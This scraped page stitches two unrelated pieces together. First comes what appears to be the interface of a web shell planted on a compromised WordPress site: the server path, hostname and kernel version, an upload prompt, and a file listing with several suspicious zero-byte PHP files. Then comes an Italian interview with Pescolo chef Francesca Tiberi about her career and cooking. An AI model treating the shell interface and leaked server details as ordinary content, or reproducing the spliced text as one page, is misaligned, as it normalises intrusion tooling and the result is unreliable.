Current Path : /var/www/vhosts/pescolo.com/httpdocs/

Linux lnx20u.coffen.de 5.4.0-149-generic #166-Ubuntu SMP Tue Apr 18 16:51:45 UTC 2023 x86_64

Upload File :

Name
Size
Permissions
Options
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.519 KB
-rw-r--r--
.user.ini
0.11 KB
-rw-r--r--
favicon.ico
1.123 KB
-rw-r--r--
fmxt.php
0 KB
-rw-r--r--
googleefced779417d36c9.html
0.052 KB
-rw-r--r--
index.php
0.396 KB
-rw-r--r--
license.txt
0 KB
-rw-r--r--
lista-ordini.php
4.04 KB
-rw-r--r--
mini.php
0 KB
-rw-r--r--
randkeyword.php
0 KB
-rw-r--r--
readme.html
7.842 KB
-rw-r--r--
style.php
0 KB
-rw-r--r--
wordfence-waf.php
0.317 KB
-rw-r--r--
wordpress-6.4.3-it_IT (1).zip
25.6 MB
-rw-r--r--
wp-22.php
0 KB
-rw-r--r--
wp-activate.php
7.042 KB
-rw-r--r--
wp-blog-header.php
0.343 KB
-rw-r--r--
wp-comments-post.php
2.269 KB
-rw-r--r--
wp-config-sample.php
3.283 KB
-rw-r--r--
wp-config.php
3.577 KB
-rw-r--r--
wp-cron.php
5.506 KB
-rw-r--r--
wp-links-opml.php
2.443 KB
-rw-r--r--
wp-load.php
3.835 KB
-rw-r--r--
wp-login.php
49.733 KB
-rw-r--r--
wp-mail.php
8.325 KB
-rw-r--r--
wp-settings.php
25.79 KB
-rw-r--r--
wp-signup.php
33.579 KB
-rw-r--r--
wp-trackback.php
4.771 KB
-rw-r--r--
xmlrpc.php
3.08 KB
-rw-r--r--
z.htm
0 KB
-rw-r--r--

Vendita pesce fresco online | Pescolo "Quando il pesce è buono...". Intervista Francesca Tiberi, chef Pescolo - Vendita pesce fresco online | Pescolo
  • Pescato

  • Allevato

  • Mitilicoltura

“Quando il pesce è buono…”. Intervista Francesca Tiberi, chef Pescolo

chef Francesca Tiberi, Pescolo

Francesca Tiberi, “Cheffa” per gli amici, conosce alla perfezione i benefici dell’alimentazione. Con le migliori materie prime prepara gli omogeneizzati del suo piccolo. Con la stessa cura affronta la sua professione di chef nella catena di pescherie Pescolo.

Professionalmente nasce in hotel a 4 stelle, dove, finita la scuola alberghiera, sceglie di imparare il mestiere. E’ negli hotel che prende forma la sua passione per la pasticceria. Passione che la porta a vincere medaglie di portata nazionale nei concorsi dell’Associazione Italiana Cuochi.

L’incontro con il pesce avviene invece in osteria, dove decide di misurarsi con il ruolo di responsabile di cucina. Sceglie di puntare sulla stagionalità. A vincere la sfida l’aiuta indubbiamente il passato da pasticcera. Precisione, conoscenza degli ingredienti e del loro mix fanno sì che la sua mano delicata riesca a premiare anche menù sofisticati.

Da poco mamma, entra a far parte del team Pescolo. Responsabile di tutta la gastronomia e delle ricette della rete di 6 punti vendita conserva la stessa mano delicata in salse, olio e sale, mantenendo leggeri i piatti e riuscendo a valorizzare il pesce fresco, anzi freschissimo.

Apprezza la materia prima perché versatile. Con ingredienti semplici come la verdura, i legumi o i cereali si possono creare piatti semplici e buoni. “Quando il pesce è buono, meno lo lavori, meglio è!”, parola di Francesca.

Da sempre Pescolo ritiene necessario non esagerare nei condimenti, non coprire il pesce con troppi sapori e lasciarlo al suo gusto naturale.
Con questa idea nascono dei menù settimanali come l’insalata di farro, salmone e fagiolini, i filetti di branzino alle erbe aromatiche con dadolata di verdure, l’insalata di pasta con il pesto di rucola, vongole e pendolini, e tanto altro ancora.

A Pescolo piace anche sperimentare. Il prodotto della settimana incontra due ricette sfiziose, fuori dal menù tradizionale. Francesca li propone ogni giovedì a menù fisso ad una clientela a cui piace confrontarsi con nuovi abbinamenti. Tutte le sue ricette del giovedì sono poi condivise sul sito www.pescolo.com come anche in tutte le 6 pescherie. Ma se vi trovate nel Pescolo di San Giovanni in Marignano (RN) potete chiedere un consiglio direttamente a Francesca. Sarà felice di ascoltare le vostre richieste.